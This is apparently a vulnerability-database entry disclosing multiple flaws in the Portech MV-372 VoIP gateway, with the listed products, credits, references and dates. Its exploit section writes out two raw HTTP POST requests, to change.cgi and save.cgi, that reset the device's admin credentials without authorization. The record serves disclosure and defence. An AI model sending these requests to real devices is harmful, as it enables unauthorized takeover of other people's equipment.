ID
VAR-E-201107-0097
EDB ID
35925
TITLE
Portech MV-372 VoIP Gateway - Multiple Vulnerabilities - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Portech MV-372 VoIP Gateway - Multiple Vulnerabilities.. remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
vendor: | portech | model: | mv-372 voip gateway | scope: | - | version: | - | Trust: 1.0 |
vendor: | portech | model: | mv-372 | scope: | eq | version: | 0 | Trust: 0.3 |
EXPLOIT
source: https://www.securityfocus.com/bid/48560/info
The Portech MV-372 VoIP Gateway is prone to multiple security vulnerabilities.
An attacker may leverage these issues to obtain potentially sensitive information, cause vulnerable devices to crash (resulting in a denial-of-service condition), or bypass certain security restrictions by sending a specially crafted HTTP POST request.
POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit
POST http://<device address>/save.cgi
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
submit=Save
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
Multiple Vulnerabilities
Trust: 1.0
CREDITS
Zsolt Imre
Trust: 0.6
EXTERNAL IDS
db: | BID | id: | 48560 | Trust: 1.9 |
db: | EXPLOIT-DB | id: | 35925 | Trust: 1.6 |
db: | EDBNET | id: | 57306 | Trust: 0.6 |
REFERENCES
url: | https://www.securityfocus.com/bid/48560/info | Trust: 1.0 |
url: | https://www.exploit-db.com/exploits/35925/ | Trust: 0.6 |
url: | http://www.portech.com.tw/p3-product1_1.asp?pid=14 | Trust: 0.3 |
SOURCES
db: | BID | id: | 48560 |
db: | EXPLOIT-DB | id: | 35925 |
db: | EDBNET | id: | 57306 |
LAST UPDATE DATE
2022-07-27T09:22:18.703000+00:00
SOURCES UPDATE DATE
db: | BID | id: | 48560 | date: | 2011-07-05T00:00:00 |
SOURCES RELEASE DATE
db: | BID | id: | 48560 | date: | 2011-07-05T00:00:00 |
db: | EXPLOIT-DB | id: | 35925 | date: | 2011-07-05T00:00:00 |
db: | EDBNET | id: | 57306 | date: | 2011-07-05T00:00:00 |